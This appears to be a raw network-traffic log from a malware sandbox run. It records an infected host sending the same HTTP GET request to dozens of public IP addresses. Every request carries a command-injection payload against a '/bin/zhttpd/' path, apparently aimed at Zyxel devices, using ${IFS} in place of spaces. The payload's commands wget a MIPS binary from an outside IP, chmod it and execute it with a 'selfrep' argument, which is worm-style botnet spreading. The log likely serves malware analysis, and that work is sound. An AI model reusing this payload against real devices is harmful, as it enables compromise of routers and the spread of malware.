                                                Jan 12, 2024 18:24:52.255990982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8567192.168.2.1345954202.236.23.242443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.256032944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8568192.168.2.1338160200.175.192.87443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.256082058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8569192.168.2.1351296210.85.244.194443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.256123066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8570192.168.2.1336078176.85.30.34443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.256169081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8571192.168.2.135209892.196.167.205443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.256227016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8572192.168.2.1333434218.87.137.178443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.256294012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8573192.168.2.1340020170.77.140.242443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.256335974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8574192.168.2.1344810202.171.24.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.256377935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8575192.168.2.1344260184.211.143.127443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.256429911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8576192.168.2.1338220101.37.99.250443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.256515980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8577192.168.2.133901066.252.7.229443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.256556034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8578192.168.2.13454962.30.234.66443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.256622076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8579192.168.2.1346578175.150.203.149443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.256674051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8580192.168.2.135811685.109.6.51443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.256735086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8581192.168.2.1360848113.70.171.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.256783962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8582192.168.2.1335940114.189.112.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.256836891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8583192.168.2.1356454121.23.51.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.256907940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8584192.168.2.1355040195.130.238.136443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.256956100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8585192.168.2.1353462191.207.252.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.257011890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8586192.168.2.1359986181.73.133.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.257059097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8587192.168.2.135799063.148.75.99443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.257133007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8588192.168.2.135896820.26.194.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.257175922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8589192.168.2.1346900160.182.157.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.257235050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8590192.168.2.133662299.96.152.161443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.257287025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8591192.168.2.133691813.253.252.117443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.257335901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8592192.168.2.1344154207.203.127.114443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.257396936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8593192.168.2.1360750211.34.122.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.257431984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8594192.168.2.135389088.71.255.233443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.257457972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8595192.168.2.1340320206.56.95.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.257539034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8596192.168.2.1337982190.254.204.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.257575035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8597192.168.2.133862261.238.70.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.257647991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8598192.168.2.133596667.23.119.79443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.257740021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8599192.168.2.1356090202.193.153.198443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.257787943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8600192.168.2.1345762202.156.28.136443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.257808924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8601192.168.2.134290488.163.208.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.257898092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8602192.168.2.1348224174.8.198.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.257950068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8603192.168.2.134139452.74.21.177443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.258008003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8604192.168.2.1339988220.148.51.141443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.258047104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8605192.168.2.13330545.57.132.189443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.258116007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8606192.168.2.1343480161.206.53.252443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.258178949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8607192.168.2.1352534146.241.67.233443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.258255005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8608192.168.2.133895250.48.155.139443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.258312941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8609192.168.2.134165632.69.35.149443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.258389950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8610192.168.2.1356518115.54.96.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.258431911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8611192.168.2.1351238184.71.206.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.258476973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8612192.168.2.135112841.134.229.148443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.258517981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8613192.168.2.1359108165.110.193.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.258582115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8614192.168.2.134492053.35.170.64443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.258650064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8615192.168.2.1345062135.214.57.142443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.258718014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8616192.168.2.1333486128.117.197.86443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.258761883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8617192.168.2.1339942158.148.10.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.258826971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8618192.168.2.1337502115.22.229.98443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.258878946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8619192.168.2.134069658.3.35.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.258934021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8620192.168.2.13582121.153.73.131443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.258991957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8621192.168.2.133374018.55.244.111443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.259076118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8622192.168.2.1338348126.167.27.45443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.259104013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8623192.168.2.1348606106.19.41.149443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.259179115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8624192.168.2.1360148208.96.35.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.259233952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8625192.168.2.135608262.157.180.63443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.259278059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8626192.168.2.1355308121.254.174.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.259334087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8627192.168.2.133444271.251.78.82443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.259380102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8628192.168.2.1348238166.37.253.133443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.259443998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8629192.168.2.136076663.20.117.130443
                                                TimestampBytes transferredDirectionData
